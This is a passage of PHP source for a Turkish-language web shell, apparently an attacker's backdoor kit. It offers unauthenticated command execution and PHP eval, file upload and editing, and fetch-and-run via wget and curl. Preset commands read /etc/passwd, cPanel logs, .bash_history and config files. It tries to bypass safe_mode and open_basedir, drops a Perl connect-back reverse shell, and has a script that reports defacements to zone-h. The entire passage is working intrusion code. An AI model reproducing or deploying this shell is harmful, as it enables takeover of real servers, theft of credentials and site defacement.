if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
{if (touch ($_REQUEST['indx'])==true){
$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
Your index contents here</textarea></p>";
input ("text","indx","Index-name",35);print " ";
input ("submit","qindsub","Create","");print $ef;die();}
if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
input ("submit","mailsub","Send-mail","");print $ef;die();}
if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
function callzone($nscdir){
if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
fwrite ($fpz,"\$arq = @ARGV[0];
\$grupo = @ARGV[1];
chomp \$grupo;
open(a,\"<\$arq\");
@site = <a>;
close(a);
\$b = scalar(@site);
for(\$a=0;\$a<=\$b;\$a++)
{chomp \$site[\$a];
if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
print \"[+] Sending \$site[\$a]\n\";
use IO::Socket::INET;
\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
print \$sock \"Accept-Language: pt-br\r\n\";
print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";
print \$sock \"Content-Length: 385\r\n\";
print \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
close(\$sock);}");
if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "[ Can't complete the operation !! ]";}
else {callfuncs("chmod 777 $zpl;chmod 777 $li");
ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
www.site1.com
www.site2.com
</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
input ("submit","zonesub","Send","");print $ef;die();}
print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
function inisaf($iniv) { $chkini=ini_get($iniv);
if(($chkini || strtolower($chkini)) !=='on'){print"<font color=DeepSkyBlue ><b>Kapali ( Guvenlik Yok )</b></font>";} else{
print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
if ($chkin==""){print " <font color=red><b>None</b></font>";}
else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
while (!feof($opop)){ $nval= fgetc($opop);}}
elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";} }
print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<tr><td>"; print"<center><br>";
print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
print "<div align=center>"; print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');
print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
callocmd('which GET','/usr/bin/GET');
print"</td>"; print"<td>";print"<br><b>Wget : </b>";
callocmd('which wget','/usr/bin/wget');
print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
callocmd('which lynx','/usr/bin/lynx');
print"</td>"; print "</tr></table>"; }print "<hr><br>";
print "<b>IP Numaran : ".$REMOTE_ADDR."<br></b>";
print "<b>Server IP : ".$SERVER_ADDR."</b>";
print"<br><b>".$SERVER_SIGNATURE."</b>";
print "<b>Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
print "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";
print "<b>Kimsin : <b>"; callfuncs('id');print"<br><b>Os : </b>";
if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print php_uname(); print "/";print PHP_OS;}
else {callfuncs('uname -a');}}print"<br>";
print"Php-versiyon : ".phpversion(); print"<br><b>Current-path : </b>";
print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
print"<br>";print "Shell'in Burda : " .__file__;
print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
print"Bos Alan: "; readable_size(disk_free_space($nscdir));
print "</center><br></font>"; print"</td></tr></table><br>";
if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir']))
{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){
$ncfile=trim($_REQUEST['cfile']);
if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
else{ $mess3= "Dosya Olustur/Sil";}}
elseif(isset($_REQUEST['delfile'])){
$ndfile=trim($_REQUEST['cfile']);
if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
else {$mess3= "Dosya Olustur/Sil";}}
else {$mess3="Dosya Olustur/Sil";}
class upload{ function upload($file,$tmp){
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
if (@copy($tmp,$nscdir."/".$file)){
print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
$ustname=trim ($_REQUEST['ustname']);ob_start();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
!isset($_REQUEST['rfiletxt'])){
if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
$files[] = $filename; sort($files);}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid black\">";
print "<center><b>Dosyalar";print "</td>";
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Boyut";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Yazma";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Okuma";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Tür";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Düzenleme";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Adlandirma";print "</td>";
print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Indir";print "</td>";if(strstr(PHP_OS,"Linux")){
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Group";print "</td>";}
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Izinler";print "</td></tr>"; foreach ($files as $nfiles){
if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
if (is_writable("$nscdir/$nfiles")){
$scmess2= "<center><font color=DeepSkyBlue >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){
$scmess3= "<center><font color=DeepSkyBlue >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klasör";}else{$scmess4= "<center><font color=DeepSkyBlue >Dosya";}
print"<tr><td style=\"border:1px solid black\">";
if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
print"</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 color=#dadada>";
if (is_dir("$nscdir/$nfiles")){print "<b>K</b>lasör";}
elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
print "</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
print"<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Düzenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>"; print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid black\">";
if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
print "<td style=\"border:1px solid black\">";
print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
print "</center>";print"</td>";}
print "<td style=\"border:1px solid DeepSkyBlue \">";print "<center><div>";
permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
print "<pre><center>".$sta;
if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
elseif(isset($_REQUEST['eval'])){
ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
elseif (isset($_REQUEST['subqcmnds'])){
if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
}print $eta."</center></pre>";}
function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
if(is_readable($rfile)&&is_file($rfile)){
$fp=fopen ($rfile,"r");print"<center>";
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
print $sf."<textarea cols=157 rows=23 name=rfiletxt>";
while (!feof($fp)){$lines = fgetc($fp);
$nlines=htmlspecialchars($lines);print $nlines;}
fclose($fp);print "</textarea>";if (is_writable($rfile)){
print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else
{print "<div><b><center>[ Can't edit <font color=DeepSkyBlue >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
fwrite ($rffp,$rfiletxt);print "<div><b><center>
[ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
</center></b></div><br>";fclose($rffp);}
else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
function callperms($chkperms){
$perms = fileperms($chkperms);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-')); print $info;}
function readable_size($size) {
if ($size < 1024) {
print $size . ' B';
}else {$units = array("kB", "MB", "GB", "TB");
foreach ($units as $unit) {
$size = ($size / 1024);
if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
input ("text","renf","New-name",20);print " ";
input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
print $sf."<textarea cols=157 rows=23 name=edittxt>";
$alltxt= file_get_contents($_REQUEST['edit']);
$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
if (is_writable($_REQUEST['edit'])){
print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit
<font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
$nedittxt=stripslashes($_REQUEST['edittxt']);
fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);
$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
elseif(isset($_REQUEST['mve'])){
if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";}
if (isset ($_REQUEST['safefile'])){
$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
if(empty($_GET['file'])){if(empty($_POST['file'])){
print "<center>[ Please choose a file first to read it using copy() ]</center>";
} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
ini_restore("safe_mode");ini_restore("open_basedir");
print "<center><pre>".$sta;
if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
function callback($nscdir,$bip,$bport){
if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
if (is_writable($nscdir)){
$fp=fopen ("back.pl","w");$backpl='back.pl';}
else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
fwrite ($fp,"use Socket;
\$system='$epath';
\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
echo \"[ User perms ][$]\";echo \"`id`\";echo;
echo \"[ Start shell ][$]\";';
if (!\$ARGV[0]) {
exit(1);
}
\$host = \$ARGV[0];
\$port = 80;
if (\$ARGV[1]) {
\$port = \$ARGV[1];
}
\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
die('Unable to Connect\n');
}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');
open(STDERR,'>&SERVER');
print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
print '\n[ A-S-T team ][ Lezr.com ]\n\n';
system(\$sys);system (\$system);
exit(0); }
");callfuncs("chmod 777 $backpl");
ob_start();
callfuncs("perl $backpl $bip $bport");
ob_clean();
print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
[ Check your connection now, if failed try changing the port number ]<br>
[ Or Go to a writable dir and then try to connect again ]<br>
[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]
</div><br>";}if (isset($_REQUEST['uback'])){
$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
delm("# Komut ÇAlistir #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
print "<tr><td width=32%><div align=left>";
print $st.$c1."<center><div><b>".$mess3.$ec;
print $c2.$sf."<center>";input("text","cfile","",53);
input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","crefile","Olustur","");
print " ";input("submit","delfile","Sil","");
print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>".$st.$c1;
print "<center><div><b>Enter the command to execute";print $ec;
print $c2.$sf."<center><div style='margin-top:7px'>";
input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td width=32%><div align=right>";print $st.$c1;
print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","credir","Create-D","");print " ";
input("submit","deldir","Delete-D","");
print "</center>".$ef.$ec.$et."</div></td></tr>";
print "<tr><td width=32%><div align=left>";print $st.$c1;
print "<center><div><b>Dosya Düzenle/Oku".$ec;print $c2.$sf."<center>";
input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","","Oku-Düzenle","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Dizin'i Göster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
input("submit","","Göster","");print " ";
input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
print "<td><div align=center>";print $st.$c1;
print "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
input("hidden","up",$nscdir,0);
print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Execute php code with eval()</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "&nbsp;<textarea cols=73 rows=3 name=eval>";
if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
print "</textarea><br><center>";
input('submit','evsub','Execute');print " ";
input('Reset','','Reset');print " ";
print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=center>";
print $st.$c1."<div><b><center>Execute useful commands</div>";
print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
print "<center><select style='width:60%' name=uscmnds size=1>
<option value='op0'>Execute quick commands</option>
<option value='op1'>ls -lia</option>
<option value='op2'>/etc/passwd</option>
<option value='op3'>/var/cpanel/accounting.log</option>
<option value='op4'>/var/named</option>
<option value='op11'>Perms in curr Dir</option>
<option value='op12'>Perms in main Dir</option>
<option value='op5'>Find service.pwd files</option>
<option value='op6'>Find config files</option>
<option value='op7'>Find .bash_history files</option>
<option value='op8'>Read hosts file</option>
<option value='op9'>Root login</option>
<option value='op10'>Show opened ports</option>
<option value='op13'>Show services</option>
</select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
print $ec.$ef.$et."</td></tr></table>";delm("");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>".$cpmvmess."</div>";
print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
print "<b><font face=tahoma size=2>&nbsp;To </b>";
input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
print "</center>".$ec.$ef.$et;
